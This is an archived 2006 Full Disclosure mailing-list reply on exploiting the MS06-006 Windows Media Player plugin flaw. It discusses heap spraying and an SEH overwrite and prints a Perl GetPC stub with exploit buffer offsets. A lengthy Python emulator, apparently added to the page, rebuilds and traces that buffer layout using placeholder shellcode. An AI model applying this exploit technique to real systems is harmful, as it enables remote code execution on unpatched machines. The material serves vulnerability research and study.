Full Disclosure mailing list archives
Re: MS06-0[0]6 Windows Media Player Exploitation [CODE]
From: H D Moore <fdlist () digitaloffense net>
Date: Fri, 17 Feb 2006 08:20:28 -0600
On Friday 17 February 2006 02:05, Matthew Murphy wrote:
> Interesting issue with regards to the module-list pointers.
> [ snip ]
> The heap spray technique works very effectively -- you end up with a *sizable* pad in the 0x04a00000 region which you can use as a direct jump point for the payload, without any of the fancy frame manipulation tricks that I am too tired to try at this hour of the night/morning.

Nice :-)

> This should also be (theoretically) version-independent. Thanks to the similarities of the heap management APIs and the fact that most DLLs from MS use high bases, I'd bet money that this works across WMP versions on anything from NT 4.0 to 2003.
I ran into problems with Skylined's alphanumeric GetPC code - on Windows XP SP2, the SEH GetPC doesn't work from inside another SEH handler (our shellcode is one, since we smash SEH on the way down). Did some fancy 8086 instructions to get around this (thanks vlad902 - the human assembler), so, fwiw:
my $getpc =
    "\x58\x58\x58".          # pop eax, pop eax, pop eax
    "\x05\x18\x29\x29\x29".  # add eax, 0x29292918
    "\x2d\x01\x29\x29\x29".  # sub eax, 0x29292901 (net: eax += 0x17)
    "\x50\x59";              # push eax, pop ecx
substr($pattern, 2082, 4, "ABC=");               # inc ecx, inc edx, inc ebx, cmp eax, imm32
substr($pattern, 2086, 4, pack('V', $addr));     # handler address; also the imm32 of the cmp above, so it is skipped when execution falls through from "ABC="
substr($pattern, 2090, length($getpc), $getpc);  # GetPC stub, reached by the fall-through
substr($pattern, 2090 + length($getpc), length($shellcode), $shellcode);  # 2082 + 0x17 = 2105 = 2090 + 15 = first byte of $shellcode
> It's likely, as well, that this one technique works on any script-enabled browser that supports the plugin with the same results.
> I tested my code across Opera/Firefox on 2000/XP/2003 - when I get some more time I will play with the heap spray method and see if that works cross-browser/os/version as well. Looks like heap spray is the way to go, at least for Firefox...
> 'Nuff teasing. Code attached. It is important to note that you should read the inline disclaimer *BEFORE* using the code.
Thanks for sharing!

-HD

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
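The layout in the Perl snippet above can be checked without a Windows box by decoding the bytes the way the CPU would. The following Python is an added illustration, not code from the post or from Metasploit: it rebuilds $pattern with the same offsets, decodes the small opcode subset the stub uses (inc/push/pop reg, and add/sub/cmp eax, imm32) and emulates it from the overwritten next-pointer. The base address, the placeholder $addr and $shellcode and the stack contents are all constructed. In particular it assumes that the third dword the stub pops is the address of the overwritten SEH record at offset 2082; that is the only value for which the net +0x17 puts eax on the first shellcode byte (2082 + 0x17 = 2105 = 2090 + 15), which is why the stub works without any SEH-based GetPC.

```python
import struct

# Constructed stand-ins (assumptions, not values from the post).
BASE = 0x00120000          # assumed address of $pattern[0] in the target process
SEH_NEXT = 2082            # offsets copied from the substr() calls in the post
SEH_HANDLER = 2086
GETPC_OFF = 2090

GETPC = (b"\x58\x58\x58"            # pop eax; pop eax; pop eax
         b"\x05\x18\x29\x29\x29"    # add eax, 0x29292918
         b"\x2d\x01\x29\x29\x29"    # sub eax, 0x29292901  (net: eax += 0x17)
         b"\x50\x59")               # push eax; pop ecx

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def build_pattern(addr, shellcode, size=4096):
    """Lay the bytes out exactly as the four substr() calls do.
    Returns the pattern and the offset of the first shellcode byte."""
    pat = bytearray(b"A" * size)                      # filler, like a Metasploit pattern
    pat[SEH_NEXT:SEH_NEXT + 4] = b"ABC="              # overwritten "next" pointer
    pat[SEH_HANDLER:SEH_HANDLER + 4] = struct.pack("<I", addr)   # overwritten handler ($addr)
    pat[GETPC_OFF:GETPC_OFF + len(GETPC)] = GETPC
    sc_off = GETPC_OFF + len(GETPC)
    pat[sc_off:sc_off + len(shellcode)] = shellcode
    return bytes(pat), sc_off


def decode(code, pc, stop):
    """Decode one instruction from the subset this stub uses.
    Returns (mnemonic, operand, next_pc); operand is a register name or an imm32."""
    op = code[pc]
    if 0x40 <= op <= 0x47:
        return "inc", REGS[op - 0x40], pc + 1
    if 0x50 <= op <= 0x57:
        return "push", REGS[op - 0x50], pc + 1
    if 0x58 <= op <= 0x5F:
        return "pop", REGS[op - 0x58], pc + 1
    if op in (0x05, 0x2D, 0x3D):
        # add/sub/cmp eax, imm32: the four bytes that follow are data, not code
        imm = struct.unpack_from("<I", code, pc + 1)[0]
        return {0x05: "add", 0x2D: "sub", 0x3D: "cmp"}[op], imm, pc + 5
    raise ValueError(f"unsupported opcode {op:#x} at offset {pc}")


def run_stub(pattern, stack, start=SEH_NEXT, stop=GETPC_OFF + len(GETPC)):
    """Emulate from the overwritten next-pointer to the end of the GetPC stub.
    `stack` lists the dwords successive pops return, top of stack first."""
    regs = dict.fromkeys(REGS, 0)
    stack = list(stack)
    trace = []
    pc = start
    while pc < stop:
        mnem, opnd, nxt = decode(pattern, pc, stop)
        trace.append((pc, mnem, opnd))
        if mnem == "inc":
            regs[opnd] = (regs[opnd] + 1) & 0xFFFFFFFF
        elif mnem == "pop":
            regs[opnd] = stack.pop(0)
        elif mnem == "push":
            stack.insert(0, regs[opnd])
        elif mnem == "add":
            regs["eax"] = (regs["eax"] + opnd) & 0xFFFFFFFF
        elif mnem == "sub":
            regs["eax"] = (regs["eax"] - opnd) & 0xFFFFFFFF
        # "cmp" only sets flags, and nothing in the stub consumes them
        pc = nxt
    return regs, trace


def demo():
    """True if the stub leaves eax (and ecx) pointing at the shellcode."""
    shellcode = b"\xcc" * 16                  # constructed placeholder payload
    pattern, sc_off = build_pattern(0x41414141, shellcode)   # placeholder $addr
    record_va = BASE + SEH_NEXT
    # Assumption: the third popped dword is the address of the overwritten SEH record.
    stack = [0x11111111, 0x22222222, record_va]
    regs, _ = run_stub(pattern, stack)
    return regs["eax"] == BASE + sc_off and regs["ecx"] == regs["eax"]


if __name__ == "__main__":
    pat, sc_off = build_pattern(0x41414141, b"\xcc" * 16)
    regs, trace = run_stub(pat, [0x11111111, 0x22222222, BASE + SEH_NEXT])
    for off, mnem, opnd in trace:
        print(f"{off:5d}: {mnem} {opnd if isinstance(opnd, str) else hex(opnd)}")
    print(f"eax -> pattern+{regs['eax'] - BASE}, shellcode at pattern+{sc_off}")
```

The trace makes the two points of the layout visible: the "ABC=" bytes written over the next-pointer decode as three harmless incs plus a cmp whose imm32 is the handler address, so execution falls straight through the handler pointer into the stub at 2090; and the two add/sub immediates cancel to +0x17, which is exactly the distance from the record to the payload, so no address of the stub itself ever has to be recovered.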
Current thread:
- MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation H D Moore (Feb 16)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] Matthew Murphy (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-0[0]6 Windows Media Player Exploitation [CODE] H D Moore (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 17)
- Re: MS06-06 Windows Media Player Exploitation c0ntex (Feb 16)
- Re: MS06-06 Windows Media Player Exploitation ad () heapoverflow com (Feb 16)
